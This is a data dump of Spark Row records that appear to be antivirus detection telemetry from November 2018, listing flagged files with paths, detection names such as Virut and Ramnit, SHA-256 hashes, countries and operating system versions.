  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='f15485acaa89854e72ded151ffd3ae344ccf1a9179b88fdae9f1fcd134dc64b5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='a96290b02ca8f9ec46bf2021980c1cdb156290d0d603123a65cf58b56323af56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:32:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pnpgagda.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\pNpgAgDa.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222055-905c0dc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222055-905C0DC0', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:20:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wondershareallmytube-downloader.exe', filepath='G:\\NewDownload\\wondershareallmytube-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='b8d6daa9725ba3a395dbee1f87bf77d59b4822231c4f18a7dd06cf003939f9ed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:04:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-211203-ce7dbfbf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2eb1b43c\\AVSCAN-20181102-210813-AE62A200\\AVSCAN-20181102-211203-CE7DBFBF', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T20:12:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lvtn_ver1.exe', filepath='\\\\?\\C:\\Program Files\\Lab Manager\\app.publish\\lvtn_ver1.exe', filesize=5356000, name='HEUR/APC.#M1.#R1'), hash='ebb8e16a7fc25d2e49645cf0db3753bf87b38bddece2342c7503c80981f4d35f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:41:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dogetolf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DoGETOLF.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:49:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081407-3268879a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081407-3268879A', filesize=64000, name='BDS/Rogue.766033.#M1.#R1'), hash='b2b0f58fa1af9c59f6d9f33219f003bfd2fd1044818f2d998d754fa3f7043a74', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:14:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultraiso.exe', filepath='H:\\HBCD\\Programs\\UltraISO.exe', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bbd51e1acacba08f51acaaec351b35dabb33de6d047c59f88a688858205a24b6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T04:20:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:41:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f_0a0627', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_0a0627', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='c5fd1b2efaa7e9d5a2001ddd370ee233ee35b0a5b44042eb4dabdf8f7b3aa602', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-02T14:39:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ati_high_definition_audio_device_5.18.0.5502_xp_x86.exe', filepath='N:\\NAS-Laufwerk\\Treiber\\Treibersicherung 12Mai2014\\ATI_High_Definition_Audio_Device_5.18.0.5502_xp_x86.exe', filesize=576000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='c2bb8e1e66d4901333bc0c86223a27af63f4a88de9ca06dc67ef01de9c56ae72', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8870024, timestamp='2018-11-02T15:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8bd9dfa412f36b3d6b5824c60ed3a61d241db5d188f0daffcde567c7a7c28d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\8BD9DFA412F36B3D6B5824C60ED3A61D241DB5D188F0DAFFCDE567C7A7C28D79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8bd9dfa412f36b3d6b5824c60ed3a61d241db5d188f0daffcde567c7a7c28d79', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='regschdtask.exe', filepath='C:\\Program Files (x86)\\ASUS\\App Box\\RegSchdTask.exe', filesize=848000, name='W32/Jeefo.A.#M1.#R1'), hash='b1756b4bff7572c5e2469801e246ee03b1e34c35c195abcfe737af2d8ad499be', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:0v2uTjq900G1WWGJ.1', country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T09:01:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='baixaki_citra-emulator.exe', filepath='E:\\downloads\\Baixaki_citra-emulator.exe', filesize=1864000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='b9e3f379f3d1d3d3d2500567e86e1ca1dddceedb41c84109d679be7492844b06', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:29:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\lgE2D08.tmp\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:24:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\0hhvjrn2wnr\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:03:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='disableusbwin7.exe', filepath='F:\\HBCD\\Programs\\DisableUSBWin7.exe', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gcaclientdll.dll', filepath='C:\\Program Files (x86)\\Garena Plus\\Room\\gcaclientdll.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='cd4ac8d5b574de69d3fdafa613fc92de2570b91b65537a6ad18518275d24b2e5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-02T15:23:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-071401-6d95d5c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-233739-5B760E05\\AVSCAN-20181102-071401-6D95D5C4', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\iuivjmdpqfg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131740-305b5942', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131740-305B5942', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='F:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gaara teen.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Gaara teen\\Gaara teen.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ba7bc93a650996a930d825ba2c603a527280558b4d0f3335fa0ad591647af708', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:58:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='killbox.exe', filepath="H:\\Hirens.BootCD.15.2\\Hiren's.BootCD.15.2\\HBCD\\Programs\\KillBox.exe", filesize=196000, name='W32/Ramnit.C.#M1.#R1'), hash='e0ce96af2847403ea4c68b2954486309f4544b81c02bcc738c98191fb6aacce4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=770648, timestamp='2018-11-02T14:56:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered redol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered redol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a3cd24b89528caefdeb3fb22f11c6fc4c47deeb2c9cf2812b59294bd122c625c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:23:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-203645-317bdebb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-203645-317BDEBB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c5be27f1-d668-8543-40e5-5f099e5597fb.exe', filepath='H:\\{c4660af2-ce72-7ee5-10f7-7509699c4809}\\c5be27f1-d668-8543-40e5-5f099e5597fb.exe', filesize=256000, name='TR/Qadars.DW.#M1.#R1'), hash='eeb05cb6449871a2c95dc56268ad0a29828a440b1bfe728ae9d8b7b178fcabf6', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T07:37:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='launcher.dll', filepath='D:\\GAMES\\ONLINE GAMES\\steam\\steamapps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='d75f93ad74999547e17e1e0b3c0880499d036a29d5314a17b21159f32bd53618', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:28:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:24:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d12841befd786ff23785cc83cbd3e2229244e14adad9b99c0b7545886e945c07', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D12841BEFD786FF23785CC83CBD3E2229244E14ADAD9B99C0B7545886E945C07', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d12841befd786ff23785cc83cbd3e2229244e14adad9b99c0b7545886e945c07', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:13:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a5a7', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a5a7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:58:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294261', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294261', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:36:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dca0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dca0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl151.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl151.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291f62', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291f62', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:02:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293137', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293137', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:23:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='afdwufiohelper.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Ulead Systems\\Ulead VideoStudio SE DVD\\afdwuFIOHelper.dll', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='e224002d8723466e1666733d7bef676ccd79dabffd1031bfea5adee1d879e877', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:57:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-11-04-170650/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151438-27e97be0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-151438-27E97BE0', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151233-1a132738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-151233-1A132738', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:12:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fa01a3cb3cc1f9b6be64b755a6c5d6523abfc1112d969a6ed51e5c96db11e793', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\FA01A3CB3CC1F9B6BE64B755A6C5D6523ABFC1112D969A6ED51E5C96DB11E793', filesize=576000, name='HEUR/AGEN.1001165.#M1.#R1'), hash='fa01a3cb3cc1f9b6be64b755a6c5d6523abfc1112d969a6ed51e5c96db11e793', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T06:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='debuginfocollector.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Genieo\\Application\\Engine\\bin\\debugInfoCollector.exe', filesize=28000, name='Adware/Genieo.28000.#M1.#R1'), hash='f471175643810b674a21d4d2c123e134e10a7d0edf56f3913078ff6c5072e2d9', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:58:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-075709-ea83ba09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_118d13bd\\AVSCAN-20181101-075621-E26C7D02\\AVSCAN-20181101-075709-EA83BA09', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:57:21Z'), dt=datetime.date(2018, 11, 1))],
